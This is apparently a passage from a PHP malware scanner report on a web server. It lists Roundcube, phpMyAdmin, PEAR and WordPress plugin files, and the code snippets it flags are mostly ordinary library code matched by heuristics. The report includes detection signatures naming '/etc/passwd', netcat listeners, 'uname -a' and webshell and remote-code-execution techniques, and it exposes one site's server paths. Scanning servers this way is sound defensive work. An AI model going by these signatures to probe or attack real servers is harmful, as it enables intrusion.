exec($command, $output, $return_code); $this->_debug("LDAP: Command output:" . var_export($output, true)); $this->_debug("Return code: " . $return_code); if ($return_code) { $this->_error("Command $moz_ldapsearch returned error code: $return_code"); return null; } $lines = array(); foreach ($output as $line_num => $line) { if (substr($line, 0, 1) == " ") { $lines[count($lines)-1] .= trim($line); } else { $lines[] = trim($line); } } $attributes = array( 'dn' => $subject_dn, 'attributelevelrights'...
| Function syslog Warning Potentially dangerous function `syslog` [https://www.php.net/syslog] |
syslog($level, implode("\n", $msg)); } } private function _encode_attrs($attributes) { if (isset($attributes['userpassword'])) { $attributes['userpassword'] = '*'; } return json_encode($attributes); } public static function quote_string($str, $is_dn = false, $reverse = false) { if (is_array($str)) { $str = reset($str); } if ($is_dn) { $replace = array( ',' => '\2c', '=' => '\3d', '+' => '\2b', '<' => '\3c', '>' => '\3e', ';' => '\3b', "\\"=> '\5c', '"' => '\22', '#' => '\23' ); } else { $replace...
|
|
//usr/share/roundcubemail/vendor/pear/pear-core-minimal/src/PEAR.php Size: 35.34 kB Created: 2019-11-19 22:00:24 Modified: 2021-06-12 16:03:27 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('$e = new Exception($this->message, $this->code);throw($e);'); } } public function PEAR_Error( $message = 'unknown error', $code = null, $mode = null, $options = null, $userinfo = null ) { self::__construct($message, $code, $mode, $options, $userinfo); } function getMode() { return $this->mode; } function getCallback() { return $this->callback; } function getMessage() { return ($this->error_message_prefix . $this->message); } function getCode() { return $this->code; } function getType() { r...
|
|
//usr/share/roundcubemail/vendor/pear/pear-core-minimal/src/PEAR/ErrorStack.php Size: 33.02 kB Created: 2019-11-19 22:00:24 Modified: 2021-06-12 16:03:27 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function() code'; } else { $ret['function'] = $funcbacktrace['function']; } } } if (isset($funcbacktrace['class']) && isset($backtrace[1])) { $ret['class'] = $funcbacktrace['class']; } return $ret; } return false; } public static function getErrorMessage(&$stack, $err, $template = false) { if ($template) { $mainmsg = $template; } else { $mainmsg = $stack->getErrorMessageTemplate($err['code']); } $mainmsg = str_replace('%__msg%', $err['message'], $mainmsg); if (is_array($err['params']) && ...
|
|
//usr/share/roundcubemail/vendor/pear/pear-core-minimal/src/OS/Guess.php Size: 10.64 kB Created: 2019-11-19 22:00:24 Modified: 2021-06-12 16:03:27 Dangers: 2
| Description | Match |
|---|
Sign 963e968a Line: 19 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
| Sign a915f4c2 Line: 19 Dangerous Malware Signature (hash: a915f4c2) |
uname -a
|
|
//usr/share/roundcubemail/vendor/pear/net_ldap2/Net/LDAP2/Search.php Size: 18.64 kB Created: 2015-10-30 23:34:22 Modified: 2021-06-12 16:03:27 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("array_multisort($sort_params \$to_sort);"); } return $to_sort; } public function sorted($attrs = array('cn'), $order = SORT_ASC) { $return = array(); $sorted = $this->sorted_as_struct($attrs, $order); if (PEAR::isError($sorted)) { return $sorted; } foreach ($sorted as $key => $row) { $entry = $this->_ldap->getEntry($row['dn'], $this->searchedAttrs()); if (!PEAR::isError($entry)) { array_push($return, $entry); } else { return $entry; } } return $return; } public function as_struct() { $retu...
|
|
//usr/share/roundcubemail/vendor/pear/console_commandline/Console/CommandLine/Action/Password.php Size: 2.70 kB Created: 2020-04-16 18:04:15 Modified: 2021-06-12 16:03:27 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system('stty -echo'); @flock(STDIN, LOCK_EX); $passwd = fgets(STDIN); @flock(STDIN, LOCK_UN); system('stty echo'); } return trim($passwd)
|
|
//usr/share/roundcubemail/vendor/pear/auth_sasl/Auth/SASL/SCRAM.php Size: 12.25 kB Created: 2017-03-07 17:37:05 Modified: 2021-06-12 16:03:27 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$data', 'return hash("' . $hashes[$hash] . '", $data, TRUE);'); $this->hmac = create_function('$key,$str,$raw', 'return hash_hmac("' . $hashes[$hash] . '", $str, $key, $raw);'); } elseif ($hash == 'md5') { $this->hash = create_function('$data', 'return md5($data, true);'); $this->hmac = array($this, '_HMAC_MD5'); } elseif (in_array($hash, array('sha1', 'sha-1'))) { $this->hash = create_function('$data', 'return sha1($data, true);'); $this->hmac = array($this, '_HMAC_SHA1'); } el...
|
|
//usr/share/roundcubemail/vendor/pear/crypt_gpg/Crypt/GPG/ProcessControl.php Size: 4.19 kB Created: 2020-03-22 14:49:18 Modified: 2021-06-12 16:03:27 Warns: 2
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($command); $parts = explode(',', $result); $running = (count($parts) > 1 && trim($parts[1], '"') == $this->pid); } else { $result = exec('ps -p ' . escapeshellarg($this->pid) . ' -o pid='); $running = (trim($result) == $this->pid); } return $running; } public function terminate() { if (function_exists('posix_kill')) { posix_kill($this->pid, 15); } elseif (PHP_OS === 'WINNT') { exec('taskkill /PID ' . escapeshellarg($this->pid)); } else { exec('kill -15 ' . escapeshellarg($this->pid))
| Function posix_kill Warning Potentially dangerous function `posix_kill` [https://www.php.net/posix_kill] |
posix_kill($this->pid, 15); } elseif (PHP_OS === 'WINNT') { exec('taskkill /PID ' . escapeshellarg($this->pid)); } else { exec('kill -15 ' . escapeshellarg($this->pid))
|
|
//usr/share/roundcubemail/vendor/pear/crypt_gpg/Crypt/GPG/Engine.php Size: 65.58 kB Created: 2020-03-22 14:49:18 Modified: 2021-06-12 16:03:27 Warns: 4
| Description | Match |
|---|
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
posix_getpwuid(posix_getuid()); $this->_homedir = $info['dir'].'/.gnupg'; } else { if (isset($_SERVER['HOME'])) { $this->_homedir = $_SERVER['HOME']; } else { $this->_homedir = getenv('HOME'); } } if ($this->_homedir === false) { throw new Crypt_GPG_FileException( 'Could not locate homedir. Please specify the homedir ' . 'to use with the \'homedir\' option when instantiating ' . 'the Crypt_GPG object.' ); } } if (!is_dir($this->_homedir)) { if (@mkdir($this->_homedir, 0777, true)) { chmod($this-...
| Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($this->_process); if ($exitCode < 0 && $status && !$status['running']) { $exitCode = $status['exitcode']; } if ($exitCode > 0) { $this->_debug( '=> subprocess returned an unexpected exit code: ' . $exitCode ); } $this->_process = null; $this->_pipes = array(); if (is_resource($this->_input)) { fclose($this->_input); } if (is_resource($this->_output)) { fclose($this->_output); } $this->_processHandler->throwException($exitCode); } $this->_closeAgentLaunchProcess(); if ($this->_agentInf...
| Function proc_get_status Warning Potentially dangerous function `proc_get_status` [https://www.php.net/proc_get_status] |
proc_get_status($this->_process); $exitCode = proc_close($this->_process); if ($exitCode < 0 && $status && !$status['running']) { $exitCode = $status['exitcode']; } if ($exitCode > 0) { $this->_debug( '=> subprocess returned an unexpected exit code: ' . $exitCode ); } $this->_process = null; $this->_pipes = array(); if (is_resource($this->_input)) { fclose($this->_input); } if (is_resource($this->_output)) { fclose($this->_output); } $this->_processHandler->throwException($exitCode); } $this->_c...
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open( $agentCommandLine, $agentDescriptorSpec, $this->_agentPipes, null, $env, array('binary_pipes' => true) ); if (!is_resource($this->_agentProcess)) { throw new Crypt_GPG_OpenSubprocessException( 'Unable to open gpg-agent subprocess.', 0, $agentCommandLine ); } $agentInfo = fread($this->_agentPipes[self::FD_OUTPUT], self::CHUNK_SIZE); if ($version21) { $agentInfo .= "\n" . fread($this->_agentPipes[self::FD_ERROR], self::CHUNK_SIZE); } if ($agentInfo) { foreach (explode("\n", $agentInfo) ...
|
|
//usr/share/roundcubemail/vendor/roundcube/plugin-installer/src/Roundcube/Composer/PluginInstaller.php Size: 11.66 kB Created: 2020-11-02 23:04:07 Modified: 2021-06-12 16:03:27 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system(getcwd() . "/vendor/bin/rcubeinitdb.sh --package=$plugin_name --dir=$sqldir"); } } if (!empty($extra['roundcube']['post-install-script'])) { $self->rcubeRunScript($extra['roundcube']['post-install-script'], $package); } }; $promise = parent::install($repo, $package); if ($promise instanceof PromiseInterface) { return $promise->then($postInstall); } $postInstall(); } public function update(InstalledRepositoryInterface $repo, PackageInterface $initial, PackageInterface $target) { $this->rcu...
|
|
//usr/share/roundcubemail/installer/check.php Size: 8.91 kB Created: 2021-02-08 22:29:41 Modified: 2021-06-12 16:03:25 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 65 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//usr/share/doc/php-pecl-memcache-3.0.8/memcache.php Size: 28.43 kB Created: 2013-04-08 06:12:54 Modified: 2020-09-18 10:16:23 Dangers: 2
|
//usr/share/doc/git-1.8.3.1/contrib/mw-to-git/t/install-wiki/LocalSettings.php Size: 4.29 kB Created: 2013-06-11 00:01:55 Modified: 2020-09-08 13:22:11 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 122 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//usr/share/phpMyAdmin/test/classes/plugin/import/ImportLdi_test.php Size: 6.89 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
| Description | Match |
|---|
Sign 91535293 Line: 245 Dangerous Malware Signature (hash: 91535293) |
LOAD DATA LOCAL INFILE
|
|
//usr/share/phpMyAdmin/test/classes/PMA_ServerStatusData_test.php Size: 3.70 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/test/libraries/PMA_server_databases_test.php Size: 8.15 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/test/libraries/rte/PMA_EVN_getQueryFromRequest_test.php Size: 5.71 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/test/libraries/PMA_server_status_processes_test.php Size: 7.08 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/test/libraries/PMA_server_status_queries_test.php Size: 6.57 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/test/libraries/core/PMA_securePath_test.php Size: 873.00 B Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 2
| Description | Match |
|---|
Exploit etc_passwd Line: 27 Dangerous The `/etc/passwd` file on Unix systems contains password information, an attacker who has accessed the `etc/passwd` file may attempt a brute force attack of all passwords on the system |
/etc/passwd
| Sign b236d073 Line: 27 Dangerous Malware Signature (hash: b236d073) |
/etc/passwd
|
|
//usr/share/phpMyAdmin/test/libraries/PMA_server_status_monitor_test.php Size: 11.50 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/test/libraries/PMA_server_status_variables_test.php Size: 6.85 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/test/libraries/PMA_server_replication_test.php Size: 7.99 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 2
|
//usr/share/phpMyAdmin/test/libraries/PMA_server_privileges_test.php Size: 66.23 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/test/libraries/PMA_server_status_advisor_test.php Size: 5.20 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/test/libraries/PMA_server_status_test.php Size: 7.09 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/server_privileges.php Size: 12.37 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 2
|
//usr/share/phpMyAdmin/server_status.php Size: 980.00 B Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/server_replication.php Size: 2.06 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/server_status_processes.php Size: 1.97 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/import.php Size: 25.11 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
| Description | Match |
|---|
Sign 91535293 Line: 9 Dangerous Malware Signature (hash: 91535293) |
LOAD DATA LOCAL INFILE
|
|
//usr/share/phpMyAdmin/server_status_queries.php Size: 1.72 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/db_structure.php Size: 10.31 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
|
//usr/share/phpMyAdmin/server_status_monitor.php Size: 3.37 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/index.php Size: 20.95 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 2
| Description | Match |
|---|
Sign 471b95ee Line: 613 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
| Sign 471b95ee Line: 616 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//usr/share/phpMyAdmin/server_status_variables.php Size: 1.57 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/server_status_advisor.php Size: 986.00 B Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:38 Dangers: 1
|
//usr/share/phpMyAdmin/libraries/server_status_variables.lib.php Size: 28.86 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
|
//usr/share/phpMyAdmin/libraries/DBQbe.class.php Size: 55.38 kB Created: 2021-06-28 02:40:46 Modified: 2022-01-04 22:25:37 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 886 Warning Double var technique is usually used for the obfuscation of malicious code |
${$or}
|
|
//usr/share/phpMyAdmin/libraries/replication_gui.lib.php Size: 38.20 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 2
|
//usr/share/phpMyAdmin/libraries/core.lib.php Size: 31.79 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
| Description | Match |
|---|
Sign 0f37c730 Line: 597 Dangerous Malware Signature (hash: 0f37c730) |
meta http-equiv="Refresh" content="0;
|
|
//usr/share/phpMyAdmin/libraries/server_variables.lib.php Size: 54.90 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
|
//usr/share/phpMyAdmin/libraries/DatabaseInterface.class.php Size: 102.86 kB Created: 2021-06-28 02:40:46 Modified: 2022-01-04 22:25:37 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 632 Warning Double var technique is usually used for the obfuscation of malicious code |
${$sort_by}
|
|
//usr/share/phpMyAdmin/libraries/tbl_info.inc.php Size: 3.45 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 100 Warning Double var technique is usually used for the obfuscation of malicious code |
${$each_create_option[0]}
|
|
//usr/share/phpMyAdmin/libraries/rte/rte_events.lib.php Size: 23.73 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
|
//usr/share/phpMyAdmin/libraries/build_html_for_db.lib.php Size: 6.10 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 122 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$stat['description_function']($current[$stat_name])
|
|
//usr/share/phpMyAdmin/libraries/ServerStatusData.class.php Size: 14.24 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 2
|
//usr/share/phpMyAdmin/libraries/server_privileges.lib.php Size: 153.53 kB Created: 2021-06-28 02:40:46 Modified: 2022-01-04 22:25:37 Dangers: 2
|
//usr/share/phpMyAdmin/libraries/server_status.lib.php Size: 9.71 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
|
//usr/share/phpMyAdmin/libraries/sysinfo.lib.php Size: 8.36 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Warns: 1
| Description | Match |
|---|
Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] |
shell_exec('kstat -p d ' . $key)) { list(, $value) = preg_split("/\t/", trim($m), 2); return $value; } else { return ''; } } public function loadavg() { $load1 = $this->_kstat('unix:0:system_misc:avenrun_1min'); return array('loadavg' => $load1); } public function supported() { return @is_readable('/proc/meminfo'); } public function memory() { $pagesize = $this->_kstat('unix:0:seg_cache:slab_size'); $mem = array(); $mem['MemTotal'] = $this->_kstat('unix:0:system_pages:pagestotal') * $pagesize; $...
|
|
//usr/share/phpMyAdmin/libraries/sql-formatter/lib/SqlFormatter.php Size: 44.21 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
|
//usr/share/phpMyAdmin/libraries/server_databases.lib.php Size: 14.46 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 2
| Description | Match |
|---|
Exploit nano Line: 263 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$stat['description_function']($stat['footer'])
| Function strrev eval_strrev Line: 389 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
lave
|
|
//usr/share/phpMyAdmin/libraries/structure.lib.php Size: 111.12 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
|
//usr/share/phpMyAdmin/libraries/logging.lib.php Size: 567.00 B Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Warns: 1
| Description | Match |
|---|
Function apache_note Warning Potentially dangerous function `apache_note` [https://www.php.net/apache_note] |
apache_note('userID', $user); apache_note('userStatus', $status)
|
|
//usr/share/phpMyAdmin/libraries/dbi/DBIDummy.class.php Size: 29.85 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 2
|
//usr/share/phpMyAdmin/libraries/Advisor.class.php Size: 14.99 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('$value = ' . $expr . ';'); $err = ob_get_contents(); } catch (Exception $e) { $err = $e->getMessage(); } ob_end_clean(); if ($err) { throw new Exception( strip_tags($err) . '<br />Executed code: $value = ' . htmlspecialchars($expr) . ';' ); } return $value; } public static function parseRulesFile() { $file = file('libraries/advisory_rules.txt', FILE_IGNORE_NEW_LINES); $errors = array(); $rules = array(); $lines = array(); $ruleSyntax = array( 'name', 'formula', 'test', 'issue', 'recommenda...
|
|
//usr/share/phpMyAdmin/libraries/replication.inc.php Size: 8.76 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 2
|
//usr/share/phpMyAdmin/libraries/config.default.php Size: 63.07 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 50 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//usr/share/phpMyAdmin/libraries/config/messages.inc.php Size: 45.91 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 760 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//usr/share/phpMyAdmin/libraries/config/setup.forms.php Size: 10.78 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 123 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//usr/share/phpMyAdmin/libraries/config/user_preferences.forms.php Size: 8.58 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 55 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//usr/share/phpMyAdmin/libraries/plugins/transformations/abstract/ExternalTransformationsPlugin.class.php Size: 4.60 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Warns: 2
| Description | Match |
|---|
Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($process); } if ($options[2] == 1 || $options[2] == '2') { $retstring = htmlspecialchars($newstring); } else { $retstring = $newstring; } return $retstring; } public static function getName()
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open($program . ' ' . $options[1], $descriptorspec, $pipes); if (is_resource($process)) { fwrite($pipes[0], $buffer); fclose($pipes[0]); while (!feof($pipes[1])) { $newstring .= fgets($pipes[1], 1024); } fclose($pipes[1]); proc_close($process); } if ($options[2] == 1 || $options[2] == '2') { $retstring = htmlspecialchars($newstring); } else { $retstring = $newstring; } return $retstring; } public static function getName()
|
|
//usr/share/phpMyAdmin/libraries/common.inc.php Size: 36.02 kB Created: 2021-06-28 02:40:46 Modified: 2022-01-04 22:25:37 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 1160 Dangerous Malware Signature (hash: 11413268) |
exploit
|
|
//usr/share/phpMyAdmin/libraries/Util.class.php Size: 157.06 kB Created: 2021-06-28 02:40:46 Modified: 2022-01-04 22:25:37 Dangers: 2
| Description | Match |
|---|
Sign 471b95ee Line: 1813 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
| Sign 471b95ee Line: 1814 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//usr/share/phpMyAdmin/libraries/sqlparser.data.php Size: 19.33 kB Created: 2017-01-23 22:08:47 Modified: 2022-01-04 22:25:37 Dangers: 1
|
//usr/share/php/Net/LDAP3.php Size: 108.03 kB Created: 2018-09-17 15:14:01 Modified: 2020-07-22 14:48:07 Warns: 2
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($command, $output, $return_code); $this->_debug("LDAP: Command output:" . var_export($output, true)); $this->_debug("Return code: " . $return_code); if ($return_code) { $this->_error("Command $moz_ldapsearch returned error code: $return_code"); return null; } $lines = array(); foreach ($output as $line_num => $line) { if (substr($line, 0, 1) == " ") { $lines[count($lines)-1] .= trim($line); } else { $lines[] = trim($line); } } if ($this->vendor_name() == "Oracle Corporation") { foreach ($li...
| Function syslog Warning Potentially dangerous function `syslog` [https://www.php.net/syslog] |
syslog($level, implode("\n", $msg)); } } private static function _ber_addseq($str, $identifier) { $len = dechex(strlen($str)/2); if (strlen($len) % 2 != 0) { $len = '0'.$len; } return $identifier . $len . $str; } private static function _ber_encode_int($offset) { $val = dechex($offset); $prefix = ''; if (preg_match('/^[89abcdef]/', $val)) { $prefix = '00'; } if (strlen($val)%2 != 0) { $prefix .= '0'; } return $prefix . $val; } public static function quote_string($str, $is_dn = false, $reverse = ...
|
|
//usr/share/php/tcpdf/include/tcpdf_colors.php Size: 14.35 kB Created: 2018-10-16 20:24:05 Modified: 2020-07-22 14:48:16 Dangers: 1
|
//usr/share/php/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2018-10-16 20:24:05 Modified: 2020-07-22 14:48:16 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//usr/share/php/gettext/gettext.php Size: 12.35 kB Created: 2016-11-29 10:39:51 Modified: 2020-07-22 14:48:07 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("$string"); if ($plural >= $total) $plural = $total - 1; return $plural; } function ngettext($single, $plural, $number) { if ($this->short_circuit) { if ($number != 1) return $plural; else return $single; } $select = $this->select_string($number); $key = $single . chr(0) . $plural; if ($this->enable_cache) { if (! array_key_exists($key, $this->cache_translations)) { return ($number != 1) ? $plural : $single; } else { $result = $this->cache_translations[$key]; $list = explode(chr(0), $result...
|
|
//usr/share/awstats/tools/nginx/awstats-fcgi.php Size: 967.00 B Created: 2016-12-03 15:58:28 Modified: 2021-06-12 16:03:21 Warns: 2 Dangers: 1
| Description | Match |
|---|
Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($process); } else { header('Status: 500 Internal Server Error'); echo('Internal Server Error'); } } else { header('Status: 404 Page Not Found'); echo('Page Not Found')
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open($_SERVER['X_SCRIPT_FILENAME'], $descriptorspec, $pipes, NULL, $newenv); if (is_resource($process)) { fclose($pipes[0]); $head = fgets($pipes[1]); while (strcmp($head, "\n")) { header($head); $head = fgets($pipes[1]); } fpassthru($pipes[1]); fclose($pipes[1]); fclose($pipes[2]); $return_value = proc_close($process); } else { header('Status: 500 Internal Server Error'); echo('Internal Server Error'); } } else { header('Status: 404 Page Not Found'); echo('Page Not Found')
| Sign 5aabe84e Line: 13 Dangerous Malware Signature (hash: 5aabe84e) |
proc_open($_SERVER[
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2020-04-30 18:02:15 Modified: 2020-07-24 20:08:06 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2020-04-30 18:02:15 Modified: 2020-07-24 20:08:06 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 20:20:50 Modified: 2021-05-16 20:20:50 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 20:20:50 Modified: 2021-05-16 20:20:50 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 20:20:50 Modified: 2021-05-16 20:20:50 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 20:20:50 Modified: 2021-05-16 20:20:50 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/saratov/data/www/intim-saratov.ru/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 20:20:50 Modified: 2021-05-16 20:20:50 Dangers: 2
| Description | Match |
|---|
Exploit execution2 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
